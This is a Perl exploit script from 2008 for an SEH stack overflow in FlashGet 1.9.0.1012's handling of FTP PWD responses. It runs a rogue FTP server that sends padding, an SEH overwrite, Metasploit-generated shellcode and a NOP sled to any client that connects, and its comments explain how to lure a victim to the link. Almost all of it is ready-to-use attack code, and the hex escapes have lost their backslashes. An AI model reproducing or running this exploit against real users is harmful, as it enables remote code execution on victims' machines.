flashget190-overflow.txt
Posted on 15 August 2008
#!/usr/bin/perl # FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit # Coded By SkOd, skod.uk at gmail dot com # Tested over Windows XP sp1 Hebrew # link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer. ## # PoC by Krystian Kloskowski (h07) <h07@interia.pl> # http://milw0rm.com/exploits/6240 ## # special thanks to a friend of mine who helped me use IO::Socket; ####################################[ Parameters ]######################################## my $SHELLCODE = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b". "xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55". "x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59". "xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d". "x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76". "xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34". "x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b". "x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78". "x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14". "x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10"; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com # The Host that will be listen to the Download request from Flashget my $HOST = '127.0.0.1'; #your own ip #################################[Don't Edit From Here]##################################### ######################################[Defines]############################################# my $PADDING_CHAR = "A"; my $PADDING_SIZE = 324; #The code will return to next_seh_chain so i make it as jump and invalid address #so it will be decoded as last in chain. my $NEXT_SEH_IN_CHAIN = "xEBx06xFFxFF"; # JMP +6 #Settings Return Address my $CUR_SEH_ADDRESS = "x8Bx19x01x10"; # Chosen Ret Addr is : 0x1001198B FlashGetFGBTCORE.dll v1.0. 0.36 # 1001198B 5E POP ESI # 1001198C 5B POP EBX # 1001198D C3 RETN # Building SEH Block my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN . $CUR_SEH_ADDRESS; #Creating Payload $PAYLOAD = $PADDING_CHAR x $PADDING_SIZE; $PAYLOAD .= $SEH_BLOCK; $PAYLOAD .= $SHELLCODE; $PAYLOAD .= "x90" x 300; #Putting alot of nops so the code will get Exception that we write after stack is over #witch will make it to call our code $LISTEN_PORT = 21; ########################################################################## print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit "; print "# Coded By SkOd, skod.ukx40gmailx2ecom "; my $serverSocket = new IO::Socket::INET (Listen => 1, LocalAddr => $HOST, LocalPort => $LISTEN_PORT, Proto => 'tcp'); do { print " [~] listening... "; $clientSocket = $serverSocket->accept(); print "[+] New Connection Recived "; $clientSocket->send("220 WELCOME! "); $isPayloadSent = 0; while($isPayloadSent == 0) { $clientSocket->recv($recvBuffer,1024); print "[~] Recived: " . $recvBuffer; if($recvBuffer =~ /USER/) { $clientSocket->send("331 Password required for l33t "); } elsif($recvBuffer =~ /PASS/) { $clientSocket->send("230 User l33t logged in. "); } else { $clientSocket->send("257 "$PAYLOAD" "); print("[+] The payload has been sent... "); $isPayloadSent = 1; } } $clientSocket->close(); } while (true);
